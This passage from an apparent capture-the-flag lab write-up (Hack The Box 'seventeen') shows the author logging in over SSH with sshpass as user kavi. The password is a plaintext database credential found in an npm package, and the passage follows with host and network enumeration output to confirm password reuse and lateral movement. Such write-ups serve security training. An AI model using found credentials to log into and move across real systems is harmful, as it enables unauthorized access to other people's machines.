SSH


Testing the DB credential found in the npm package for password reuse against the SSH server:

┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sshpass -p 'IhateMathematics123#' ssh kavi@$IP
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-177-generic x86_64)
 
 * documentation:  https://help.ubuntu.com
 * management:     https://landscape.canonical.com
 * support:        https://ubuntu.com/advantage
 
  system information as of tue jun 20 09:51:38 UTC 2023
 
  system load:                    1.59
  usage of /:                     60.4% of 11.75GB
  memory usage:                   60%
  swap usage:                     0%
  processes:                      365
  users logged in:                1
  ip address for eth0:            10.10.11.165
  ip address for br-3539a4850ffa: 172.20.0.1
  ip address for docker0:         172.17.0.1
  ip address for br-b3834f770aa3: 172.18.0.1
  ip address for br-cc437cf0c6a8: 172.19.0.1
 
 
18 updates can be applied immediately.
12 of these updates are standard security updates.
to see these additional updates run: apt list --upgradable
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
You have mail.
kavi@seventeen:~$ whoami
kavi
kavi@seventeen:~$ hostname
seventeen
kavi@seventeen:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:f7:8e brd ff:ff:ff:ff:ff:ff
    inet 10.10.11.165/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever
3: br-3539a4850ffa: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ad:ed:89:94 brd ff:ff:ff:ff:ff:ff
    inet 172.20.0.1/16 brd 172.20.255.255 scope global br-3539a4850ffa
       valid_lft forever preferred_lft forever
4: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:70:54:47:3c brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
5: br-b3834f770aa3: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:37:9a:86:c3 brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-b3834f770aa3
       valid_lft forever preferred_lft forever
6: br-cc437cf0c6a8: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:1e:d1:50:bc brd ff:ff:ff:ff:ff:ff
    inet 172.19.0.1/16 brd 172.19.255.255 scope global br-cc437cf0c6a8
       valid_lft forever preferred_lft forever
8: veth3ba5125@if7: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether f2:b1:d2:35:69:e4 brd ff:ff:ff:ff:ff:ff link-netnsid 0
10: veth029ff08@if9: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-3539a4850ffa state UP group default 
    link/ether 32:da:9e:80:f5:5b brd ff:ff:ff:ff:ff:ff link-netnsid 1
12: veth26e4f9a@if11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 82:69:f7:99:dc:27 brd ff:ff:ff:ff:ff:ff link-netnsid 2
14: veth8c69545@if13: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 7a:43:96:45:5d:56 brd ff:ff:ff:ff:ff:ff link-netnsid 3
16: veth0b6c881@if15: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 92:07:82:b4:22:4a brd ff:ff:ff:ff:ff:ff link-netnsid 4
18: veth4387c3f@if17: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether ea:5b:23:3d:a5:a1 brd ff:ff:ff:ff:ff:ff link-netnsid 5
20: veth9eabe87@if19: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 72:68:13:86:32:55 brd ff:ff:ff:ff:ff:ff link-netnsid 6
22: veth207300e@if21: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 22:38:d3:15:aa:3b brd ff:ff:ff:ff:ff:ff link-netnsid 7
24: veth9a8a4fa@if23: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether f6:44:eb:e1:ce:c6 brd ff:ff:ff:ff:ff:ff link-netnsid 8
26: veth983f638@if25: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 4a:f1:50:33:b2:d9 brd ff:ff:ff:ff:ff:ff link-netnsid 9
28: veth5e6b256@if27: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether ba:66:eb:55:17:b4 brd ff:ff:ff:ff:ff:ff link-netnsid 10
30: veth38f14e2@if29: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether de:e2:71:28:5b:b7 brd ff:ff:ff:ff:ff:ff link-netnsid 11

Password reuse confirmed for the kavi user.
Lateral movement made to the kavi user via SSH.